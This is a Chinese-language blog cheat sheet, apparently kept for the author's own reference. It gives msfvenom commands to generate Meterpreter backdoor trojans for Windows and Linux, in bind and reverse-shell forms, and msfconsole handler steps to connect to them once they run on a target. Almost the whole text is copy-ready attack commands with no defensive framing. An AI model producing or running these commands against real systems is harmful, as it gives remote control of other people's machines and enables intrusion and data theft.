MSF生成后门木马

前言

为了方便平时使用,记录一下操作命令


一、正向连接的木马?

注意:lhost为本地地址,rhost为目标地址

1、?Windows

生成连接木马

msfvenom -p windows/x64/meterpreter/bind_tcp lhost=192.168.63.135 lport=6666 -f exe -o test.exe

将木马放到目标服务器运行

使用模块连接我们的木马

msfconsole                                         
use exploit/multi/handler                          
set payload windows/x64/meterpreter/bind_tcp  	   
set rhost 192.168.53.135					       # 目标主机ip
set lport 6666                                     
exploit 

2、?Linux

使用msfvenom模块生成连接木马

msfvenom -p linux/x64/meterpreter/bind_tcp lhost=192.168.53.135 lport=6666 -f elf > test.elf
  • x64生成64位的?
  • x86生成32位的?

elf为可执行的二进制文件
若传入的木马没权限执行

chmod +x test.elf  # 给木马程序赋予可执行权限

使用模块进行连接

msfconsole                                        
use exploit/multi/handler                         
set payload linux/x64/meterpreter/bind_tcp  	 
set rhost 192.168.53.135					    # 目标主机ip  
set lport 6666                                    
exploit 

二、反向连接的木马?

1、?Windows

使用模块生成反弹木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.53.135 lport=6666 -f exe -o test.exe

监听反弹的木马

msfconsole                                         
use exploit/multi/handler                          
set payload windows/x64/meterpreter/reverse_tcp  	   
set lhost 192.168.53.135                          # 我们的本机IP
set lport 6666                                     
exploit                                           

2、?Linux

生成木马

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.53.135  LPORT=6666 -f elf > test.elf

监听反弹的木马

msfconsole                                         
use exploit/multi/handler                          
set payload linux/x64/meterpreter/reverse_tcp  	  
set lhost 192.168.53.135                         
set lport 6666                                    
exploit                                           

版权声明:本文为m0_55793759原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。